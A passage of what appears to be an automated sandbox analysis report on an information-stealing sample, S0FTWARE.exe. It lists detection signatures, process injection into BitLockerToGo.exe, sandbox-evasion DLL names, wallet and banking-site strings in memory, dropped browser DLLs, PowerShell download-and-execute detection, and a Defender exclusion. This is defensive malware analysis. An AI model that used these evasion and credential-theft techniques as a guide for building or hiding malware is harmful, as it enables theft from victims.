                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13780000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13556000.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.138bdec0.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13780000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13556000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13880000.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.138c6000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.138c6000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.13780000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.13780000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.138bdec0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.138bdec0.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13880000.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.13880000.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.138c6000.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000003.2190648021.0000000013764000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2247124098.000000001376C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.2190543178.0000000013800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2247358214.0000000013A5C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2246493920.0000000013471000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.2190136482.000000001387E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2247221901.0000000013880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: S0FTWARE.exe PID: 744, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 6152, type: MEMORYSTR
                        Switches to a custom stack to bypass stack traces
                        Source: C:\ProgramData\GHDAKKJJJK.exeAPI/Special instruction interceptor: Address: C05172
                        Source: C:\ProgramData\GHDAKKJJJK.exeAPI/Special instruction interceptor: Address: BFEBEC
                        Source: C:\ProgramData\GHDAKKJJJK.exeAPI/Special instruction interceptor: Address: 74880F
                        Source: C:\ProgramData\GHDAKKJJJK.exeAPI/Special instruction interceptor: Address: 7EF0C8
                        Source: C:\ProgramData\GHDAKKJJJK.exeAPI/Special instruction interceptor: Address: 6DDAD3
                        Source: C:\ProgramData\GHDAKKJJJK.exeAPI/Special instruction interceptor: Address: C35757
                        Source: C:\ProgramData\GHDAKKJJJK.exeAPI/Special instruction interceptor: Address: BA1F15
                        Source: C:\ProgramData\GHDAKKJJJK.exeAPI/Special instruction interceptor: Address: 7C0878
                        Source: C:\ProgramData\GHDAKKJJJK.exeAPI/Special instruction interceptor: Address: 74FD4B
                        Source: C:\Users\user\AppData\Roaming\service.exeAPI/Special instruction interceptor: Address: 8C6D65
                        Source: C:\Users\user\AppData\Roaming\service.exeAPI/Special instruction interceptor: Address: 7EF0C8
                        Source: C:\Users\user\AppData\Roaming\service.exeAPI/Special instruction interceptor: Address: BD0C8A
                        Source: C:\Users\user\AppData\Roaming\service.exeAPI/Special instruction interceptor: Address: BE94D3
                        Source: C:\Users\user\AppData\Roaming\service.exeAPI/Special instruction interceptor: Address: B5FB0E
                        Source: C:\Users\user\AppData\Roaming\service.exeAPI/Special instruction interceptor: Address: 7BCCD1
                        Source: C:\Users\user\AppData\Roaming\service.exeAPI/Special instruction interceptor: Address: C063AF
                        Source: C:\Users\user\AppData\Roaming\service.exeAPI/Special instruction interceptor: Address: 85A9AD
                        Source: C:\Users\user\AppData\Roaming\service.exeAPI/Special instruction interceptor: Address: 86D552
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: BitLockerToGo.exeBinary or memory string: DIR_WATCH.DLL
                        Source: BitLockerToGo.exeBinary or memory string: SBIEDLL.DLL
                        Source: BitLockerToGo.exeBinary or memory string: API_LOG.DLL
                        Source: BitLockerToGo.exe, 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpBinary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL10:31:5110:31:5110:31:5110:31:5110:31:5110:31:51DELAYS.TMP%S%SNTDLL.DLL
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,3_2_02A017FD
                        Source: C:\Users\user\Desktop\S0FTWARE.exeCode function: 0_3_12E9E248 sldt word ptr [eax]0_3_12E9E248
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5799
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3987
                        Source: C:\ProgramData\GHDAKKJJJK.exeWindow / User API: threadDelayed 799
                        Source: C:\ProgramData\GHDAKKJJJK.exeWindow / User API: threadDelayed 9191
                        Source: C:\Users\user\AppData\Roaming\service.exeWindow / User API: threadDelayed 1804
                        Source: C:\Users\user\AppData\Roaming\service.exeWindow / User API: threadDelayed 8184
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI coverage: 7.9 %
                        Source: C:\Windows\System32\svchost.exe TID: 2616Thread sleep time: -60000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\svchost.exe TID: 6756Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3056Thread sleep count: 5799 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3056Thread sleep count: 3987 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7708Thread sleep time: -7378697629483816s >= -30000s
                        Source: C:\ProgramData\GHDAKKJJJK.exe TID: 8044Thread sleep count: 799 > 30
                        Source: C:\ProgramData\GHDAKKJJJK.exe TID: 8044Thread sleep time: -239700s >= -30000s
                        Source: C:\ProgramData\GHDAKKJJJK.exe TID: 8044Thread sleep count: 9191 > 30
                        Source: C:\ProgramData\GHDAKKJJJK.exe TID: 8044Thread sleep time: -2757300s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\service.exe TID: 8140Thread sleep count: 1804 > 30
                        Source: C:\Users\user\AppData\Roaming\service.exe TID: 8140Thread sleep time: -541200s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\service.exe TID: 8140Thread sleep count: 8184 > 30
                        Source: C:\Users\user\AppData\Roaming\service.exe TID: 8140Thread sleep time: -2455200s >= -30000s
                        Source: C:\Windows\SysWOW64\timeout.exe TID: 7372Thread sleep count: 84 > 30
                        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\ProgramData\GHDAKKJJJK.exeLast function: Thread delayed
                        Source: C:\ProgramData\GHDAKKJJJK.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\service.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\service.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A12A37 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 02A12B4Ah3_2_02A12A37
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A16A05 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,strtok_s,strtok_s,_memset,lstrcat,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,3_2_02A16A05
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A17178 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,3_2_02A17178
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A0A941 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,_memset,lstrcat,lstrcat,lstrcat,CopyFileA,_memset,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A0A941
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A0CE96 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,3_2_02A0CE96
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A0E5B9 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A0E5B9
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A18D90 SHGetFolderPathA,wsprintfA,FindFirstFileA,_mbscmp,_mbscmp,_mbscmp,_splitpath,_ismbcupper,wsprintfA,SHFileOperation,FindNextFileA,FindClose,3_2_02A18D90
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A17D20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A17D20
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A0C528 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_02A0C528
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A01D70 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A01D70
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A0C888 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A0C888
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A1785A GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,3_2_02A1785A
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A0DD2A wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,3_2_02A0DD2A
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A16E7F GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,3_2_02A16E7F
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A12C16 GetSystemInfo,wsprintfA,3_2_02A12C16
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                        Source: chrome.exe, 00000005.00000002.2737314403.000007C000B0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                        Source: chrome.exe, 00000005.00000002.2725842240.000002781368E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                        Source: chrome.exe, 00000005.00000002.2742527483.000007C0015AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Virtual USB Mouse
                        Source: chrome.exe, 00000005.00000002.2728265641.00000278171F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_pa
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E74000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3282779040.0000028B2582B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3285247315.0000028B2AE54000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.5172263794.0000015B47CC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: msedge.exe, 00000009.00000003.2764858034.00007CF000324000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                        Source: chrome.exe, 00000005.00000002.2725842240.00000278135E7000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000009.00000002.2818968256.000001C85A643000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: S0FTWARE.exe, 00000000.00000002.2234570138.0000000002248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll$
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                        Source: svchost.exe, 0000000D.00000002.5171771210.0000015B47C2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@_
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                        Source: chrome.exe, 00000005.00000002.2734345767.000007C0006F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=31ec732a-8015-48bf-86e8-986a17602f4b
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_3-68347
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_3-68363
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_3-69482
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A1F20C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_02A1F20C
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A1A132 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_02A1A132
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A0149D mov eax, dword ptr fs:[00000030h]3_2_02A0149D
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A01492 mov eax, dword ptr fs:[00000030h]3_2_02A01492
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A0147A mov eax, dword ptr fs:[00000030h]3_2_02A0147A
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A19D79 mov eax, dword ptr fs:[00000030h]3_2_02A19D79
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A19D78 mov eax, dword ptr fs:[00000030h]3_2_02A19D78
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A13AB9 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,3_2_02A13AB9
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A1F20C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_02A1F20C
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A1E88C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_02A1E88C
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A28EAE SetUnhandledExceptionFilter,3_2_02A28EAE
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C70AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6C70AC62

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Yara detected Powershell download and execute
                        Source: Yara matchFile source: Process Memory Space: S0FTWARE.exe PID: 744, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 6152, type: MEMORYSTR
                        Adds a directory exclusion to Windows Defender
